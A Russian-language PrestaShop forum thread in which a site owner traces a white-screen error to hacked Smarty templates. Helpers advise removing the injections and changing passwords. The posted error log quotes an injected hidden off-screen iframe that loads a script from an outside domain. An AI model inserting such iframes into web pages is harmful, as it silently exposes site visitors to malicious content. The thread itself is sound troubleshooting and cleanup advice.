Ответить Новая тема Новый опрос 
 не загружается сайт, белый экран
ceilingsy
Новичок

13-01-2014 23:28
работал сайт нормально. не изменил системные файлы. как-то захожу белый экран ! админка работает нормально. уже такое, не в первый раз и разных хостингах . приходилось переустанавливать(((

ПМ Отправить эл.сообщение 
Щелкните, и это сообщение будет добавлено в ваш ответ как цитата Цитировать этот ответ
avpet
Cпециалист

14-01-2014 12:47
видимо что-то со смарти, включите отображение ошибок!

Щелкните, и это сообщение будет добавлено в ваш ответ как цитата Цитировать этот ответ
ceilingsy
Новичок

14-01-2014 14:21
я проверял через firebug, ошибка 500. у меня 3 сайта на Престе и разный хостинг, так периодически не работает сайты. Приходиться заливать новый и подключить базу старую.

а вот сами ошибки:

адрес сайт я скрыл.

PHP Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/sata2/home/users/ceilingsy/www/www..com.ua/modules/blocklanguages/blocklanguages.tpl" on line 57 "</div><!--d9d021--><style>body {overflow-x:hidden;overflow-y:auto;} </style><iframe id="u" name="u" style="position:absolute; height: 90px; width:110px; left:5000px; top:110px;" src="http://wolnoscrwp.pl/iffystats.php?id=5198485&qu......021-->" - Unexpected ":", expected one of: "}" , " " , ATTR' in /sata2/home/users/ceilingsy/www/www..com.ua/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php:667
mod_fcgid: stderr: Stack trace:
mod_fcgid: stderr: #0 /sata2/home/users/ceilingsy/www/www..com.ua/tools/smarty/sysplugins/smarty_internal_templateparser.php(3144): Smarty_Internal_TemplateCompilerBase->trigger_template_error()

Сообщение отредактировано ceilingsy 14-01-2014 15:29 ...

avpet
Cпециалист

14-01-2014 16:20
у вас в modules/blocklanguages/blocklanguages.tp ссылка на сайт, добавленная энтузиастами или проще говоря хакерами, ломает логику смарти. отсюда и ошибки. зайдите удалите её. только осторожно. поэтому периодически возникает эта ошибка.
проще сказать, у вас сайт взломан, надо его лечить.

ceilingsy
Новичок

14-01-2014 20:46
Большое спасибо!!! РЕАЛЬНО ПОМОГЛИ. Вот еще один вопрос : если один сайт взломали, а как другие сайты смогли найти ?

Сообщение отредактировано ceilingsy 14-01-2014 21:46 ...

avpet
Cпециалист

14-01-2014 21:12
наверняка всё лежит на одном аккаунте, так и находят, потому что при определённых условиях видно все сайты одного аккаунта.

ceilingsy
Новичок

16-01-2014 05:46
Сегодня снова прекратил работать сайт !!! Я Просмотрел ЛОГИ нашел ошибки в файлах : productscategory.tpl; editorial.tpl и blocktopmenu.tpl . В этих файлах появились ссылки на построение сайт, все ссылки удалил, сайт заработал.
Что вы можете посоветовать предпринять ? и вообще как с этим бороться, что-бы не повторялось ?

Сообщение отредактировано ceilingsy 16-01-2014 06:55 ...

zedko
Новичок

18-01-2014 13:27
Смените пароли к админке, проверьте FTP пользователей и смените пароли, пароль к панели управления хостингом тоже смените + обратитесь к хостеру за советами по улучшению безопасности. Если это не помогает, ищите вирус у себя на машине

avpet
Cпециалист

18-01-2014 18:28
я бы ещё посоветовал, проверить сайты на наличие вредоносных скриптов. одно из первых что нужно сделать. Провести анализ лог файлов веб сервера кстати тоже желательно сделать, причем посмотреть какие скрипты запускались в то самое время когда были изменены данные файлы -1 минута. у меня на несколько сайтов был уязвим другой движок, но пока я это не нашёл - постоянно появлялись скрипты посторонние.
нужен совет или помощь - пишите в личку подскажу что и как)
p.s. на бд тоже желательно сменить пароли

ceilingsy
Новичок

24-01-2014 14:32
Спасибо за ответы

Ответить Новая тема Новый опрос